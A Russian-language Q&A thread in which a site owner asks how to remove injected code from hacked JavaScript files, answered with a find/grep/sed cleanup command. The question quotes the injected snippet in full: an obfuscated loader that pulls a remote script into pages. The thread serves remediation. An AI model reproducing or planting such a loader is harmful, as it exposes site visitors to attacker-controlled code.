# Рекурсивное удаление вирусного включения

Tags: linux, sed, grep

Помогите пожалуйста, разгрести последствия взлома. 
Нужно написать команду для sed или другой утилиты - удалить первые 6 строк и первый символ "}" 7-й строки во всех *.js файлах, где найдено вхождение 
`var gfjfgjk`
Вот код, который был добавлен к началу *.js файлов:

```js
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
```

Решение, наверное, должно быть таким:

```bsh
find ./ -type f -name "*.js" -exec sed -i -e 1,6d {} \;
```

Но тут не хватает проверки на вхождение строки инъекции `var gfjfgjk`
Подскажите, как добавить эту проверку?

Заранее благодарю всех откликнувшихся!

Comment: в данном случае проще будет получить список нужных файлов без привлечения программы sed. например, с помощью программы grep. а потом уже передать этот список программе sed.

Comment: Проверьте такую команду `grep -lR 'gfjfgjk' /каталог/ | xargs sed -i '7s/^{//;1,6d'`

Answer (score 4, accepted):

`-exec` в `find` работает как фильтр, а `grep` возвращает код удачного завершения только если строка в файле найдена. т.е. всё это можно скомбинировать в такую строку:

```
find ./ -type f -name "*.js" -exec grep -q 'gfjfgjk' '{}' \; -exec sed -i -e '1,6d;7s/^}//' '{}' +
```

Comment: Спасибо огромное! Вы спасли пару десятков сайтов! И миллионы нервных клеток!

Comment: *Useless use of grep...* `sed` умеет сам матчить строки.

Comment: @0andriy, не к месту придираешься... на одном `sed`'е подобную логику реализовать неоправданно геморройно...

Comment: Вставить что-то типа `/gfjfgjk/` в начало программы на `sed` — это сложно? Дело хозяйское, я же не минусую из-за этого.

Comment: Вот, в соседнем чатике сообщили: http://porkmail.org/era/unix/award.html :)

Comment: @0andriy, не каждый однострок сочетающий `grep` и `sed` — это «Useless use of»... добиться от одного `sed`'а того чтобы он, например, mtime зря не портил — не тривиальная задача... или того чтобы он обрабатывал `/gfjfgjk/`, например, на другой строке...

Comment: @Fat-Zer, я уж несколько как бросил реагировать на комментарии от пользователя `0andiry`. не столько за частую их неуместность, сколько за иногда проскальзывающее хамство (а помноженное на неуместность оно даёт в итоге гремучую смесь).